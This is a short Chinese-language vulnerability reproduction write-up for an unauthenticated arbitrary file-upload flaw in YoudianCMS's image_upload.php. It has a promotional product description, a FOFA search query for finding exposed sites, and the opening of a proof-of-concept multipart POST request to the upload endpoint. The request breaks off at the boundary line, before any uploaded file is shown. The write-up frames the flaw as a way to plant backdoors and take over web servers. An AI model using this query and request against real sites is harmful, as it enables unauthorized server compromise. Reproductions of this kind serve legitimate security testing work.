友点CMS image_upload.php 文件上传漏洞复现

0x01 产品简介

友点CMS是一款高效且灵活的网站管理系统，它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人，都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板，方便用户按需调整。同时，它具备强大的SEO功能，能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置，适应国际化需求。总的来说，友点CMS是网站建设的理想选择，既高效又易用。

0x02 漏洞概述

友点CMS建站系统image_upload.php 接口处存在文件上传漏洞，未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x03 复现环境

FOFA：app="友点建站-CMS"

0x04 漏洞复现

PoC

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
Accept-Encoding: gzip
Connection: close

------WebKitFormBoundarydAPjrmyKewWuf